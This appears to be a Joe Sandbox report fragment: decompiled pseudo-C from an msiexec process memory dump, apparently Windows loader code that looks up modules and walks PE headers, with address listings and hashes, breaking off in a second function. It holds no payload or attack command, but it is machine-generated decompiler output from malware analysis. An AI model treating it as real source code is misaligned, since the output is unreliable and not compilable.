                              				intOrPtr* _v212;
                              				char _v216;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t204;
                              				signed int _t206;
                              				void* _t208;
                              				signed int _t211;
                              				signed int _t216;
                              				intOrPtr _t217;
                              				intOrPtr* _t218;
                              				signed int _t226;
                              				signed int _t239;
                              				signed int* _t247;
                              				signed int _t249;
                              				void* _t252;
                              				signed int _t256;
                              				signed int _t269;
                              				signed int _t271;
                              				signed int _t277;
                              				signed int _t279;
                              				intOrPtr _t283;
                              				signed int _t287;
                              				signed int _t288;
                              				void* _t289;
                              				signed char _t290;
                              				signed int _t292;
                              				signed int* _t293;
                              				unsigned int _t297;
                              				signed int _t306;
                              				signed int _t307;
                              				signed int _t308;
                              				signed int _t309;
                              				signed int _t310;
                              				intOrPtr _t311;
                              				intOrPtr _t312;
                              				signed int _t319;
                              				signed int _t320;
                              				signed int* _t324;
                              				signed int _t337;
                              				signed int _t338;
                              				signed int _t339;
                              				signed int* _t340;
                              				void* _t341;
                              				signed int _t344;
                              				signed int _t348;
                              				signed int _t349;
                              				signed int _t351;
                              				intOrPtr _t353;
                              				void* _t354;
                              				signed int _t356;
                              				signed int _t358;
                              				intOrPtr _t359;
                              				signed int _t361;
                              				signed int _t363;
                              				signed short* _t365;
                              				void* _t367;
                              				intOrPtr _t369;
                              				void* _t370;
                              				signed int _t371;
                              				signed int _t372;
                              				void* _t374;
                              				signed int _t376;
                              				void* _t384;
                              				signed int _t387;
                              
                              				_v8 =  *0x4dfd360 ^ _t376;
                              				_t2 =  &_a20;
                              				 *_t2 = _a20 & 0x00000001;
                              				_t287 = _a4;
                              				_v200 = _a12;
                              				_t365 = _a8;
                              				_v212 = _a16;
                              				_v180 = _a24;
                              				_v168 = 0;
                              				_v157 = 0;
                              				if( *_t2 != 0) {
                              					__eflags = E04D16600(0x4df52d8);
                              					if(__eflags == 0) {
                              						goto L1;
                              					} else {
                              						_v188 = 6;
                              					}
                              				} else {
                              					L1:
                              					_v188 = 9;
                              				}
                              				if(_t365 == 0) {
                              					_v164 = 0;
                              					goto L5;
                              				} else {
                              					_t363 =  *_t365 & 0x0000ffff;
                              					_t341 = _t363 + 1;
                              					if((_t365[1] & 0x0000ffff) < _t341) {
                              						L109:
                              						__eflags = _t341 - 0x80;
                              						if(_t341 <= 0x80) {
                              							_t281 =  &_v140;
                              							_v164 =  &_v140;
                              							goto L114;
                              						} else {
                              							_t283 =  *0x4df7b9c; // 0x0
                              							_t281 = L04D24620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                              							_v164 = _t281;
                              							__eflags = _t281;
                              							if(_t281 != 0) {
                              								_v157 = 1;
                              								L114:
                              								E04D4F3E0(_t281, _t365[2], _t363);
                              								_t200 = _v164;
                              								 *((char*)(_v164 + _t363)) = 0;
                              								goto L5;
                              							} else {
                              								_t204 = 0xc000009a;
                              								goto L47;
                              							}
                              						}
                              					} else {
                              						_t200 = _t365[2];
                              						_v164 = _t200;
                              						if( *((char*)(_t200 + _t363)) != 0) {
                              							goto L109;
                              						} else {
                              							while(1) {
                              								L5:
                              								_t353 = 0;
                              								_t342 = 0x1000;
                              								_v176 = 0;
                              								if(_t287 == 0) {
                              									break;
                              								}
                              								_t384 = _t287 -  *0x4df7b90; // 0x770b0000
                              								if(_t384 == 0) {
                              									_t353 =  *0x4df7b8c; // 0x3052ae0
                              									_v176 = _t353;
                              									_t320 = ( *(_t353 + 0x50))[8];
                              									_v184 = _t320;
                              								} else {
                              									E04D22280(_t200, 0x4df84d8);
                              									_t277 =  *0x4df85f4; // 0x3058858
                              									_t351 =  *0x4df85f8 & 1;
                              									while(_t277 != 0) {
                              										_t337 =  *(_t277 - 0x50);
                              										if(_t337 > _t287) {
                              											_t338 = _t337 | 0xffffffff;
                              										} else {
                              											asm("sbb ecx, ecx");
                              											_t338 =  ~_t337;
                              										}
                              										_t387 = _t338;
                              										if(_t387 < 0) {
                              											_t339 =  *_t277;
                              											__eflags = _t351;
                              											if(_t351 != 0) {
                              												__eflags = _t339;
                              												if(_t339 == 0) {
                              													goto L16;
                              												} else {
                              													goto L118;
                              												}
                              												goto L151;
                              											} else {
                              												goto L16;
                              											}
                              											goto L17;
                              										} else {
                              											if(_t387 <= 0) {
                              												__eflags = _t277;
                              												if(_t277 != 0) {
                              													_t340 =  *(_t277 - 0x18);
                              													_t24 = _t277 - 0x68; // 0x30587f0
                              													_t353 = _t24;
                              													_v176 = _t353;
                              													__eflags = _t340[3] - 0xffffffff;
                              													if(_t340[3] != 0xffffffff) {
                              														_t279 =  *_t340;
                              														__eflags =  *(_t279 - 0x20) & 0x00000020;
                              														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                              															asm("lock inc dword [edi+0x9c]");
                              															_t340 =  *(_t353 + 0x50);
                              														}
                              													}
                              													_v184 = _t340[8];
                              												}
                              											} else {
                              												_t339 =  *(_t277 + 4);
                              												if(_t351 != 0) {
                              													__eflags = _t339;
                              													if(_t339 == 0) {
                              														goto L16;
                              													} else {
                              														L118:
                              														_t277 = _t277 ^ _t339;
                              														goto L17;
                              													}
                              													goto L151;
                              												} else {
                              													L16:
                              													_t277 = _t339;
                              												}
                              												goto L17;
                              											}
                              										}
                              										goto L25;
                              										L17:
                              									}
                              									L25:
                              									E04D1FFB0(_t287, _t353, 0x4df84d8);
                              									_t320 = _v184;
                              									_t342 = 0x1000;
                              								}
                              								if(_t353 == 0) {
                              									break;
                              								} else {
                              									_t366 = 0;
                              									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                              										_t288 = _v164;
                              										if(_t353 != 0) {
                              											_t342 = _t288;
                              											_t374 = E04D5CC99(_t353, _t288, _v200, 1,  &_v168);
                              											if(_t374 >= 0) {
                              												if(_v184 == 7) {
                              													__eflags = _a20;
                              													if(__eflags == 0) {
                              														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                              														if(__eflags != 0) {
                              															_t271 = E04D16600(0x4df52d8);
                              															__eflags = _t271;
                              															if(__eflags == 0) {
                              																_t342 = 0;
                              																_v169 = _t271;
                              																_t374 = E04D17926( *(_t353 + 0x50), 0,  &_v169);
                              															}
                              														}
                              													}
                              												}
                              												if(_t374 < 0) {
                              													_v168 = 0;
                              												} else {
                              													if( *0x4dfb239 != 0) {
                              														_t342 =  *(_t353 + 0x18);
                              														E04D8E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                              													}
                              													if( *0x4df8472 != 0) {
                              														_v192 = 0;
                              														_t342 =  *0x7ffe0330;
                              														_t361 =  *0x4dfb218; // 0x4d7ed9e9
                              														asm("ror edi, cl");
                              														 *0x4dfb1e0( &_v192, _t353, _v168, 0, _v180);
                              														 *(_t361 ^  *0x7ffe0330)();
                              														_t269 = _v192;
                              														_t353 = _v176;
                              														__eflags = _t269;
                              														if(__eflags != 0) {
                              															_v168 = _t269;
                              														}
                              													}
                              												}
                              											}
                              											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                              												_t366 = 0xc000007a;
                              											}
                              											_t247 =  *(_t353 + 0x50);
                              											if(_t247[3] == 0xffffffff) {
                              												L40:
                              												if(_t366 == 0xc000007a) {
                              													__eflags = _t288;
                              													if(_t288 == 0) {
                              														goto L136;
                              													} else {
                              														_t366 = 0xc0000139;
                              													}
                              													goto L54;
                              												}
                              											} else {
                              												_t249 =  *_t247;
                              												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                              													goto L40;
                              												} else {
                              													_t250 = _t249 | 0xffffffff;
                              													asm("lock xadd [edi+0x9c], eax");
                              													if((_t249 | 0xffffffff) == 0) {
                              														E04D22280(_t250, 0x4df84d8);
                              														_t342 =  *(_t353 + 0x54);
                              														_t165 = _t353 + 0x54; // 0x54
                              														_t252 = _t165;
                              														__eflags =  *(_t342 + 4) - _t252;
                              														if( *(_t342 + 4) != _t252) {
                              															L135:
                              															asm("int 0x29");
                              															L136:
                              															_t288 = _v200;
                              															_t366 = 0xc0000138;
                              															L54:
                              															_t342 = _t288;
                              															L04D43898(0, _t288, _t366);
                              														} else {
                              															_t324 =  *(_t252 + 4);
                              															__eflags =  *_t324 - _t252;
                              															if( *_t324 != _t252) {
                              																goto L135;
                              															} else {
                              																 *_t324 = _t342;
                              																 *(_t342 + 4) = _t324;
                              																_t293 =  *(_t353 + 0x50);
                              																_v180 =  *_t293;
                              																E04D1FFB0(_t293, _t353, 0x4df84d8);
                              																__eflags =  *((short*)(_t353 + 0x3a));
                              																if( *((short*)(_t353 + 0x3a)) != 0) {
                              																	_t342 = 0;
                              																	__eflags = 0;
                              																	E04D437F5(_t353, 0);
                              																}
                              																E04D40413(_t353);
                              																_t256 =  *(_t353 + 0x48);
                              																__eflags = _t256;
                              																if(_t256 != 0) {
                              																	__eflags = _t256 - 0xffffffff;
                              																	if(_t256 != 0xffffffff) {
                              																		E04D39B10(_t256);
                              																	}
                              																}
                              																__eflags =  *(_t353 + 0x28);
                              																if( *(_t353 + 0x28) != 0) {
                              																	_t174 = _t353 + 0x24; // 0x24
                              																	E04D302D6(_t174);
                              																}
                              																L04D277F0( *0x4df7b98, 0, _t353);
                              																__eflags = _v180 - _t293;
                              																if(__eflags == 0) {
                              																	E04D3C277(_t293, _t366);
                              																}
                              																_t288 = _v164;
                              																goto L40;
                              															}
                              														}
                              													} else {
                              														goto L40;
                              													}
                              												}
                              											}
                              										}
                              									} else {
                              										L04D1EC7F(_t353);
                              										L04D319B8(_t287, 0, _t353, 0);
                              										_t200 = E04D0F4E3(__eflags);
                              										continue;
                              									}
                              								}
                              								L41:
                              								if(_v157 != 0) {
                              									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                              								}
                              								if(_t366 < 0) {
                              									L46:
                              									 *_v212 = _v168;
                              									_t204 = _t366;
                              									L47:
                              									_pop(_t354);
                              									_pop(_t367);
                              									_pop(_t289);
                              									return E04D4B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                              								} else {
                              									_t206 =  *0x4dfb2f8; // 0xee0000
                              									if((_t206 |  *0x4dfb2fc) == 0 || ( *0x4dfb2e4 & 0x00000001) != 0) {
                              										goto L46;
                              									} else {
                              										_t297 =  *0x4dfb2ec; // 0x100
                              										_v200 = 0;
                              										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                              											_t355 = _v168;
                              											_t342 =  &_v208;
                              											_t208 = E04DB6B68(_v168,  &_v208, _v168, __eflags);
                              											__eflags = _t208 - 1;
                              											if(_t208 == 1) {
                              												goto L46;
                              											} else {
                              												__eflags = _v208 & 0x00000010;
                              												if((_v208 & 0x00000010) == 0) {
                              													goto L46;
                              												} else {
                              													_t342 = 4;
                              													_t366 = E04DB6AEB(_t355, 4,  &_v216);
                              													__eflags = _t366;
                              													if(_t366 >= 0) {
                              														goto L46;
                              													} else {
                              														asm("int 0x29");
                              														_t356 = 0;
                              														_v44 = 0;
                              														_t290 = _v52;
                              														__eflags = 0;
                              														if(0 == 0) {
                              															L108:
                              															_t356 = 0;
                              															_v44 = 0;
                              															goto L63;
                              														} else {
                              															__eflags = 0;
                              															if(0 < 0) {
                              																goto L108;
                              															}
                              															L63:
                              															_v112 = _t356;
                              															__eflags = _t356;
                              															if(_t356 == 0) {
                              																L143:
                              																_v8 = 0xfffffffe;
                              																_t211 = 0xc0000089;
                              															} else {
                              																_v36 = 0;
                              																_v60 = 0;
                              																_v48 = 0;
                              																_v68 = 0;
                              																_v44 = _t290 & 0xfffffffc;
                              																E04D1E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                              																_t306 = _v68;
                              																__eflags = _t306;
                              																if(_t306 == 0) {
                              																	_t216 = 0xc000007b;
                              																	_v36 = 0xc000007b;
                              																	_t307 = _v60;
                              																} else {
                              																	__eflags = _t290 & 0x00000001;
                              																	if(__eflags == 0) {
                              																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                              																		__eflags = _t349 - 0x10b;
                              																		if(_t349 != 0x10b) {
                              																			__eflags = _t349 - 0x20b;
                              																			if(_t349 == 0x20b) {
                              																				goto L102;
                              																			} else {
                              																				_t307 = 0;
                              																				_v48 = 0;
                              																				_t216 = 0xc000007b;
                              																				_v36 = 0xc000007b;
                              																				goto L71;
                              																			}
                              																		} else {
                              																			L102:
                              																			_t307 =  *(_t306 + 0x50);
                              																			goto L69;
                              																		}
                              																		goto L151;
                              																	} else {
                              																		_t239 = L04D1EAEA(_t290, _t290, _t356, _t366, __eflags);
                              																		_t307 = _t239;
                              																		_v60 = _t307;
                              																		_v48 = _t307;
                              																		__eflags = _t307;
                              																		if(_t307 != 0) {
                              																			L70:
                              																			_t216 = _v36;
                              																		} else {
                              																			_push(_t239);
                              																			_push(0x14);
                              																			_push( &_v144);
                              																			_push(3);
                              																			_push(_v44);
                              																			_push(0xffffffff);
                              																			_t319 = E04D49730();
                              																			_v36 = _t319;
                              																			__eflags = _t319;
                              																			if(_t319 < 0) {
                              																				_t216 = 0xc000001f;
                              																				_v36 = 0xc000001f;
                              																				_t307 = _v60;
                              																			} else {
                              																				_t307 = _v132;
                              																				L69:
                              																				_v48 = _t307;
                              																				goto L70;
                              																			}
                              																		}
                              																	}
                              																}
                              																L71:
                              																_v72 = _t307;
                              																_v84 = _t216;
                              																__eflags = _t216 - 0xc000007b;
                              																if(_t216 == 0xc000007b) {
                              																	L150:
                              																	_v8 = 0xfffffffe;
                              																	_t211 = 0xc000007b;
                              																} else {
                              																	_t344 = _t290 & 0xfffffffc;
                              																	_v76 = _t344;
                              																	__eflags = _v40 - _t344;
                              																	if(_v40 <= _t344) {
                              																		goto L150;
                              																	} else {
                              																		__eflags = _t307;
                              																		if(_t307 == 0) {
                              																			L75:
                              																			_t217 = 0;
                              																			_v104 = 0;
                              																			__eflags = _t366;
                              																			if(_t366 != 0) {
                              																				__eflags = _t290 & 0x00000001;
                              																				if((_t290 & 0x00000001) != 0) {
                              																					_t217 = 1;
                              																					_v104 = 1;
                              																				}
                              																				_t290 = _v44;
                              																				_v52 = _t290;
                              																			}
                              																			__eflags = _t217 - 1;
                              																			if(_t217 != 1) {
                              																				_t369 = 0;
                              																				_t218 = _v40;
                              																				goto L91;
                              																			} else {
                              																				_v64 = 0;
                              																				E04D1E9C0(1, _t290, 0, 0,  &_v64);
                              																				_t309 = _v64;
                              																				_v108 = _t309;
                              																				__eflags = _t309;
                              																				if(_t309 == 0) {
                              																					goto L143;
                              																				} else {
                              																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                              																					__eflags = _t226 - 0x10b;
                              																					if(_t226 != 0x10b) {
                              																						__eflags = _t226 - 0x20b;
                              																						if(_t226 != 0x20b) {
                              																							goto L143;
                              																						} else {
                              																							_t371 =  *(_t309 + 0x98);
                              																							goto L83;
                              																						}
                              																					} else {
                              																						_t371 =  *(_t309 + 0x88);
                              																						L83:
                              																						__eflags = _t371;
                              																						if(_t371 != 0) {
                              																							_v80 = _t371 - _t356 + _t290;
                              																							_t310 = _v64;
                              																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                              																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                              																							_t311 = 0;
                              																							__eflags = 0;
                              																							while(1) {
                              																								_v120 = _t311;
                              																								_v116 = _t348;
                              																								__eflags = _t311 - _t292;
                              																								if(_t311 >= _t292) {
                              																									goto L143;
                              																								}
                              																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                              																								__eflags = _t371 - _t359;
                              																								if(_t371 < _t359) {
                              																									L98:
                              																									_t348 = _t348 + 0x28;
                              																									_t311 = _t311 + 1;
                              																									continue;
                              																								} else {
                              																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                              																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                              																										goto L98;
                              																									} else {
                              																										__eflags = _t348;
                              																										if(_t348 == 0) {
                              																											goto L143;
                              																										} else {
                              																											_t218 = _v40;
                              																											_t312 =  *_t218;
                              																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                              																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                              																												_v100 = _t359;
                              																												_t360 = _v108;
                              																												_t372 = L04D18F44(_v108, _t312);
                              																												__eflags = _t372;
                              																												if(_t372 == 0) {
                              																													goto L143;
                              																												} else {
                              																													_t290 = _v52;
                              																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04D43C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                              																													_t307 = _v72;
                              																													_t344 = _v76;
                              																													_t218 = _v40;
                              																													goto L91;
                              																												}
                              																											} else {
                              																												_t290 = _v52;
                              																												_t307 = _v72;
                              																												_t344 = _v76;
                              																												_t369 = _v80;
                              																												L91:
                              																												_t358 = _a4;
                              																												__eflags = _t358;
                              																												if(_t358 == 0) {
                              																													L95:
                              																													_t308 = _a8;
                              																													__eflags = _t308;
                              																													if(_t308 != 0) {
                              																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                              																													}
                              																													_v8 = 0xfffffffe;
                              																													_t211 = _v84;
                              																												} else {
                              																													_t370 =  *_t218 - _t369 + _t290;
                              																													 *_t358 = _t370;
                              																													__eflags = _t370 - _t344;
                              																													if(_t370 <= _t344) {
                              																														L149:
                              																														 *_t358 = 0;
                              																														goto L150;
                              																													} else {
                              																														__eflags = _t307;
                              																														if(_t307 == 0) {
                              																															goto L95;
                              																														} else {
                              																															__eflags = _t370 - _t344 + _t307;
                              																															if(_t370 >= _t344 + _t307) {
                              																																goto L149;
                              																															} else {
                              																																goto L95;
                              																															}
                              																														}
                              																													}
                              																												}
                              																											}
                              																										}
                              																									}
                              																								}
                              																								goto L97;
                              																							}
                              																						}
                              																						goto L143;
                              																					}
                              																				}
                              																			}
                              																		} else {
                              																			__eflags = _v40 - _t307 + _t344;
                              																			if(_v40 >= _t307 + _t344) {
                              																				goto L150;
                              																			} else {
                              																				goto L75;
                              																			}
                              																		}
                              																	}
                              																}
                              															}
                              															L97:
                              															 *[fs:0x0] = _v20;
                              															return _t211;
                              														}
                              													}
                              												}
                              											}
                              										} else {
                              											goto L46;
                              										}
                              									}
                              								}
                              								goto L151;
                              							}
                              							_t288 = _v164;
                              							_t366 = 0xc0000135;
                              							goto L41;
                              						}
                              					}
                              				}
                              				L151:
                              			}
                              0x04d6b394
                              0x04d1d791
                              0x04d1d798
                              0x04d6b3a3
                              0x04d6b3bb
                              0x04d6b3bb
                              0x04d1d7a5
                              0x04d1d866
                              0x04d1d870
                              0x04d1d884
                              0x04d1d892
                              0x04d1d898
                              0x04d1d89e
                              0x04d1d8a0
                              0x04d1d8a6
                              0x04d1d8ac
                              0x04d1d8ae
                              0x04d1d8b4
                              0x04d1d8b4
                              0x04d1d8ae
                              0x04d1d7a5
                              0x04d1d78b
                              0x04d1d7b1
                              0x04d6b3c5
                              0x04d6b3c5
                              0x04d1d7c3
                              0x04d1d7ca
                              0x04d1d7e5
                              0x04d1d7eb
                              0x04d1d8eb
                              0x04d1d8ed
                              0x00000000
                              0x04d1d8f3
                              0x04d1d8f3
                              0x04d1d8f3
                              0x00000000
                              0x04d1d8ed
                              0x04d1d7cc
                              0x04d1d7cc
                              0x04d1d7d2
                              0x00000000
                              0x04d1d7d4
                              0x04d1d7d4
                              0x04d1d7d7
                              0x04d1d7df
                              0x04d6b3d4
                              0x04d6b3d9
                              0x04d6b3dc
                              0x04d6b3dc
                              0x04d6b3df
                              0x04d6b3e2
                              0x04d6b468
                              0x04d6b46d
                              0x04d6b46f
                              0x04d6b46f
                              0x04d6b475
                              0x04d1d8f8
                              0x04d1d8f9
                              0x04d1d8fd
                              0x04d6b3e8
                              0x04d6b3e8
                              0x04d6b3eb
                              0x04d6b3ed
                              0x00000000
                              0x04d6b3ef
                              0x04d6b3ef
                              0x04d6b3f1
                              0x04d6b3f4
                              0x04d6b3fe
                              0x04d6b404
                              0x04d6b409
                              0x04d6b40e
                              0x04d6b410
                              0x04d6b410
                              0x04d6b414
                              0x04d6b414
                              0x04d6b41b
                              0x04d6b420
                              0x04d6b423
                              0x04d6b425
                              0x04d6b427
                              0x04d6b42a
                              0x04d6b42d
                              0x04d6b42d
                              0x04d6b42a
                              0x04d6b432
                              0x04d6b436
                              0x04d6b438
                              0x04d6b43b
                              0x04d6b43b
                              0x04d6b449
                              0x04d6b44e
                              0x04d6b454
                              0x04d6b458
                              0x04d6b458
                              0x04d6b45d
                              0x00000000
                              0x04d6b45d
                              0x04d6b3ed
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d1d7df
                              0x04d1d7d2
                              0x04d1d7ca
                              0x04d6b37c
                              0x04d6b37e
                              0x04d6b385
                              0x04d6b38a
                              0x00000000
                              0x04d6b38a
                              0x04d1d742
                              0x04d1d7f1
                              0x04d1d7f8
                              0x04d6b49b
                              0x04d6b49b
                              0x04d1d800
                              0x04d1d837
                              0x04d1d843
                              0x04d1d845
                              0x04d1d847
                              0x04d1d84a
                              0x04d1d84b
                              0x04d1d84e
                              0x04d1d857
                              0x04d1d802
                              0x04d1d802
                              0x04d1d80d
                              0x00000000
                              0x04d1d818
                              0x04d1d818
                              0x04d1d824
                              0x04d1d831
                              0x04d6b4a5
                              0x04d6b4ab
                              0x04d6b4b3
                              0x04d6b4b8
                              0x04d6b4bb
                              0x00000000
                              0x04d6b4c1
                              0x04d6b4c1
                              0x04d6b4c8
                              0x00000000
                              0x04d6b4ce
                              0x04d6b4d4
                              0x04d6b4e1
                              0x04d6b4e3
                              0x04d6b4e5
                              0x00000000
                              0x04d6b4eb
                              0x04d6b4f0
                              0x04d6b4f2
                              0x04d1dac9
                              0x04d1dacc
                              0x04d1dacf
                              0x04d1dad1
                              0x04d1dd78
                              0x04d1dd78
                              0x04d1dcf2
                              0x00000000
                              0x04d1dad7
                              0x04d1dad9
                              0x04d1dadb
                              0x00000000
                              0x00000000
                              0x04d1dae1
                              0x04d1dae1
                              0x04d1dae4
                              0x04d1dae6
                              0x04d6b4f9
                              0x04d6b4f9
                              0x04d6b500
                              0x04d1daec
                              0x04d1daec
                              0x04d1daf5
                              0x04d1daf8
                              0x04d1dafb
                              0x04d1db03
                              0x04d1db11
                              0x04d1db16
                              0x04d1db19
                              0x04d1db1b
                              0x04d6b52c
                              0x04d6b531
                              0x04d6b534
                              0x04d1db21
                              0x04d1db21
                              0x04d1db24
                              0x04d1dcd9
                              0x04d1dce2
                              0x04d1dce5
                              0x04d1dd6a
                              0x04d1dd6d
                              0x00000000
                              0x04d1dd73
                              0x04d6b51a
                              0x04d6b51c
                              0x04d6b51f
                              0x04d6b524
                              0x00000000
                              0x04d6b524
                              0x04d1dce7
                              0x04d1dce7
                              0x04d1dce7
                              0x00000000
                              0x04d1dce7
                              0x00000000
                              0x04d1db2a
                              0x04d1db2c
                              0x04d1db31
                              0x04d1db33
                              0x04d1db36
                              0x04d1db39
                              0x04d1db3b
                              0x04d1db66
                              0x04d1db66
                              0x04d1db3d
                              0x04d1db3d
                              0x04d1db3e
                              0x04d1db46
                              0x04d1db47
                              0x04d1db49
                              0x04d1db4c
                              0x04d1db53
                              0x04d1db55
                              0x04d1db58
                              0x04d1db5a
                              0x04d6b50a
                              0x04d6b50f
                              0x04d6b512
                              0x04d1db60
                              0x04d1db60
                              0x04d1db63
                              0x04d1db63
                              0x00000000
                              0x04d1db63
                              0x04d1db5a
                              0x04d1db3b
                              0x04d1db24
                              0x04d1db69
                              0x04d1db69
                              0x04d1db6c
                              0x04d1db6f
                              0x04d1db74
                              0x04d6b557
                              0x04d6b557
                              0x04d6b55e
                              0x04d1db7a
                              0x04d1db7c
                              0x04d1db7f
                              0x04d1db82
                              0x04d1db85
                              0x00000000
                              0x04d1db8b
                              0x04d1db8b
                              0x04d1db8d
                              0x04d1db9b
                              0x04d1db9b
                              0x04d1db9d
                              0x04d1dba0
                              0x04d1dba2
                              0x04d1dba4
                              0x04d1dba7
                              0x04d1dba9
                              0x04d1dbae
                              0x04d1dbae
                              0x04d1dbb1
                              0x04d1dbb4
                              0x04d1dbb4
                              0x04d1dbb7
                              0x04d1dbba
                              0x04d1dcd2
                              0x04d1dcd4
                              0x00000000
                              0x04d1dbc0
                              0x04d1dbc0
                              0x04d1dbd2
                              0x04d1dbd7
                              0x04d1dbda
                              0x04d1dbdd
                              0x04d1dbdf
                              0x00000000
                              0x04d1dbe5
                              0x04d1dbe5
                              0x04d1dbee
                              0x04d1dbf1
                              0x04d6b541
                              0x04d6b544
                              0x00000000
                              0x04d6b546
                              0x04d6b546
                              0x00000000
                              0x04d6b546
                              0x04d1dbf7
                              0x04d1dbf7
                              0x04d1dbfd
                              0x04d1dbfd
                              0x04d1dbff
                              0x04d1dc0b
                              0x04d1dc15
                              0x04d1dc1b
                              0x04d1dc1d
                              0x04d1dc21
                              0x04d1dc21
                              0x04d1dc23
                              0x04d1dc23
                              0x04d1dc26
                              0x04d1dc29
                              0x04d1dc2b
                              0x00000000
                              0x00000000
                              0x04d1dc31
                              0x04d1dc34
                              0x04d1dc36
                              0x04d1dcbf
                              0x04d1dcbf
                              0x04d1dcc2
                              0x00000000
                              0x04d1dc3c
                              0x04d1dc41
                              0x04d1dc43
                              0x00000000
                              0x04d1dc45
                              0x04d1dc45
                              0x04d1dc47
                              0x00000000
                              0x04d1dc4d
                              0x04d1dc4d
                              0x04d1dc50
                              0x04d1dc52
                              0x04d1dc55
                              0x04d1dcfa
                              0x04d1dcfe
                              0x04d1dd08
                              0x04d1dd0a
                              0x04d1dd0c
                              0x00000000
                              0x04d1dd12
                              0x04d1dd15
                              0x04d1dd2d
                              0x04d1dd2f
                              0x04d1dd32
                              0x04d1dd35
                              0x00000000
                              0x04d1dd35
                              0x04d1dc5b
                              0x04d1dc5b
                              0x04d1dc5e
                              0x04d1dc61
                              0x04d1dc64
                              0x04d1dc67
                              0x04d1dc67
                              0x04d1dc6a
                              0x04d1dc6c
                              0x04d1dc8e
                              0x04d1dc8e
                              0x04d1dc91
                              0x04d1dc93
                              0x04d1dcce
                              0x04d1dcce
                              0x04d1dc95
                              0x04d1dc9c
                              0x04d1dc6e
                              0x04d1dc72
                              0x04d1dc75
                              0x04d1dc77
                              0x04d1dc79
                              0x04d6b551
                              0x04d6b551
                              0x00000000
                              0x04d1dc7f
                              0x04d1dc7f
                              0x04d1dc81
                              0x00000000
                              0x04d1dc83
                              0x04d1dc86
                              0x04d1dc88
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d1dc88
                              0x04d1dc81
                              0x04d1dc79
                              0x04d1dc6c
                              0x04d1dc55
                              0x04d1dc47
                              0x04d1dc43
                              0x00000000
                              0x04d1dc36
                              0x04d1dc23
                              0x00000000
                              0x04d1dbff
                              0x04d1dbf1
                              0x04d1dbdf
                              0x04d1db8f
                              0x04d1db92
                              0x04d1db95
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d1db95
                              0x04d1db8d
                              0x04d1db85
                              0x04d1db74
                              0x04d1dc9f
                              0x04d1dca2
                              0x04d1dcb0
                              0x04d1dcb0
                              0x04d1dad1
                              0x04d6b4e5
                              0x04d6b4c8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d1d831
                              0x04d1d80d
                              0x00000000
                              0x04d1d800
                              0x04d6b47f
                              0x04d6b485
                              0x00000000
                              0x04d6b485
                              0x04d1d665
                              0x04d1d652
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6f55f6f134c7b6547ea9ae5a5aa5479c521db2e454880e66934d10d475ce9398
                              • Instruction ID: 70bca79663c44ed77ff57cb2340b1679c1c57a6114e4212a29829e5c72cb6cdf
                              • Opcode Fuzzy Hash: 6f55f6f134c7b6547ea9ae5a5aa5479c521db2e454880e66934d10d475ce9398
                              • Instruction Fuzzy Hash: BDE19E30B00269AFEB34DF18D954BA9B7B2FF45308F04419ADD4A9B2A0D734BD85CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E04D1849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                              				void* _t136;
                              				signed int _t139;
                              				signed int _t141;
                              				signed int _t145;
                              				intOrPtr _t146;
                              				signed int _t149;
                              				signed int _t150;
                              				signed int _t161;
                              				signed int _t163;
                              				signed int _t165;
                              				signed int _t169;
                              				signed int _t171;
                              				signed int _t194;
                              				signed int _t200;
                              				void* _t201;
                              				signed int _t204;
                              				signed int _t206;
                              				signed int _t210;
                              				signed int _t214;
                              				signed int _t215;
                              				signed int _t218;
                              				void* _t221;
                              				signed int _t224;
                              				signed int _t226;
                              				intOrPtr _t228;
                              				signed int _t232;
                              				signed int _t233;
                              				signed int _t234;
                              				void* _t237;
                              				void* _t238;
                              
                              				_t236 = __esi;
                              				_t235 = __edi;
                              				_t193 = __ebx;
                              				_push(0x70);
                              				_push(0x4ddf9c0);
                              				E04D5D0E8(__ebx, __edi, __esi);
                              				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                              				if( *0x4df7b04 == 0) {
                              					L4:
                              					goto L5;
                              				} else {
